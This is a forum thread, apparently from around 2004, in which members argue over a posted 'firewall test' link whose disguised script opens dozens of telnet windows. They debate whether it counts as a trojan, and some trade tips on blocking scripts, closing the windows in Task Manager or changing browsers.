its not a 'trojan', its more like a f/w test, and you dont really need to reboot if it does connect

It does not matter how harmless you might think it is.

It is a worm and a forced reboot can harm your pc.

Be a sport and edit it out.

1. If any computer file when executed on a computer causes the interference of the running of that computer to the extent that the computer has to be rebooted then that file is deemed to be a Trojan file.

2. Computer Science. A program that appears to be legitimate but is designed to have destructive effects, as to data residing in the computer onto which the program was loaded.

IMHO the link should be deleted as the definition of a Trojan is clearly defined. The only reason i say this is because:

Even if you specifically asked people NOT to click - do you really think the average person on this board WONT CLICK? In that case you need to re-think. Even if the Trojan is "friendly" its still not cosha B)

I didnt click and i wont - i read enough of the posts before to be sensible enough not to ;)

As a MOD pol i find your attitude a little disturbing, this is clearly a Trojan (friendly or otherwise) - people on this forum have other programmes open as well, even whilst browsing this forum - maybe something important like online chatting, or even a programme that keeps track of something.

A simple warning like the one given above is not enough. You know as well as i do that people WILL click on it - thinking wrongly that they have enough security to bypass the problems - not everyone here is as astute as you or i when it comes to having to reboot a puter everytime something goes wrong. Someone might even panic and do real damage <_<

I think the link should be DELETED or MOVED from the lounge to an area where you guys think its fun to that sort of thing - please!!

One simple answer to all this wrangling would be for the person who posted this thread to add to the original post, instructions to members on how to get out of this test, if it goes wrong, without having to reboot their computer. If they are unable to do that then maybe Pol will help. If not then delete the link.

[memberhat=on] :1eye: i find your attitude a little disturbing too :holiday: [memberhat=off]

i think its only an issue here in this section. if you worry so much about members who dont know what to do (after they have already seen the warning) then why didnt / dont you report things like crack links / direct dl links of 600 virii etc etc

@yogi - i'm not a global mod therefore i cant do anything about lounge topics, try using this http://filesharingtalk.com/style_images/1/p_report.gif

UKMan and Sensual

1. You were warned.

2. If I told you to walk into a dark room with cutting blades would you do it? Then again THIS wasn't that bad.

3. Providing a link to the page versus a direct link is the same difference because he warned us 1st.

4. Sensual you are bitching due to stupidity.

5. If you paid attention he actually helped you.

6. This does belong in Softwareworld.

7. Quit whining!! <_< You were not permanently damaged. If you had something that needed saving and clicked the link you are dumber the previously thought (that goes for anyone).

Nice to see it did get moved at last:

@pol
In what way do you find my attitude a little disturbing? - I have explained my reason, now explain yours please!

A friendly fucking hat on your head dosnt make it any the better - <-- much less that one does!

@Busyman
Read the post again and do try to understand - who's whining here - if thats the case both you, pol and myself - trying to fob it all off by saying that warnings were given just proves you dont understand what i have said - people will still CLICK - I DIDNT by the way - you obviously didnt read that either <_<

as to your problem with my attitude, the reason i dont have a problem with the post as i said already, there has been so many topics about the 'best' fw/settings lately, so this might help people who dont know what to do with them or if their browser gets hijacked like this

as to my problem with your attitude, i have already explained to you before in a thread in the lounge a while back, i still stand by what i said in that thread. obviously you have a problem with my posts and i have a problem with yours. your concern in this thread is for those who dont know how to kill the process, the thread helps. my concern with your posts is that they mainly consist of smut and innuendo, which i dont care to read.

so if it comes down to the old "if you dont like it, dont read it or comment on it" arguement, then i could use the same in this case.

ps - it was'nt supposed to be a "friendly f*cking hat",

but there is no need to reboot.

first: my firewall blocked my telnet_app. so nothing happened

second: if i allow to connect then for sure i had to close my telnet app for several times.

but no need to reboot !!!

I agree. I did not need to reboot.
I had a similiar thing happen when used a program called Weatherbug.

i forgot:

for people who do not use a firewall:

just set your security options in ie explorer to HIGH especially let you prompt "active scripting".

ok: klick on the url ... and you are asked to prompt if a script should run

klick NO and then you can look at the source code of the.jpg file cause you know right now, that this is a file with script inside.

then YOU can decide if you want to run that script or not.

How would one do this using Sygate Pro? I can't seem to find anything regarding scripts in the options page. Also, would anyone recommend using 'stealth mode browsing' using Sygate Pro.

Disable scripts mate through your browser settings. For ie ,at the top ,tools ,internet options ,security ,custom level, then have a scroll through the options.

Or install something like popupcop & you'll have all your internet setting with a click of the mouse , on/off. :)

vivitron 15

or just close the original linked jpg in task manager, then close the telnet boxes.

Agreed. These tests that we've been seeing recently are just highlighting some of the potential dangers we, as a community, could find ourselves in.

When people whine that they've had to reboot their PC because of this, do they ever stop to think about why they had to in the first place? Surely their top of the range 'Intel Pentium 10 with Sidewinder Missiles inc. Pentagon Grade Firewall' should be able to stop these scripts.

I think this is a lesson for us all to take heed - there is threats out there far powerful then what we have been shown. If you can't at least acknowledge this, then may god have mercy on your PC.

@ FKDUP74 - Nice post. I recommend Mozilla.

Well I clicked it and used ZA to deny access and killed off IE without having to reboot. I got up to 143 telnet windows. All the windows flashing up almost gave me a seizure! :frusty:

Its a nice little test and I dont mind them but I would prefer if the thread poster mentioned the contents of the link and it's affects. (Not wanting to bring up all that stuff before cos I think its good to have these little tests on here.)

Gotta agree with using another browser, I prefer Opera myself but got used to using IE again after reinstalling XP so I'm just being sloppy!

Nothing much happened

An IE window opened and refreshed loads of times (blank page though). A telnet window opened and aload of text appeared in it (Star wars quotes and stuff).

It jammed my computer up a bit but I didn't need to reboot :)

I was really surprised at the attitude from some members, this "test" is not malicious, and doesn't hurt anything, like i said worst case is you have to reboot

namzuf9
01-12-2004, 09:14 PM
I would'nt call it malicious at all, although it could freak out a lesser experienced user! I would'nt off followed the link before knowing what to expect anyway.

Aside from disabling scripts in IE or getting rid of IE entirely what else can you use to protect yourself from "malicious" scripts?
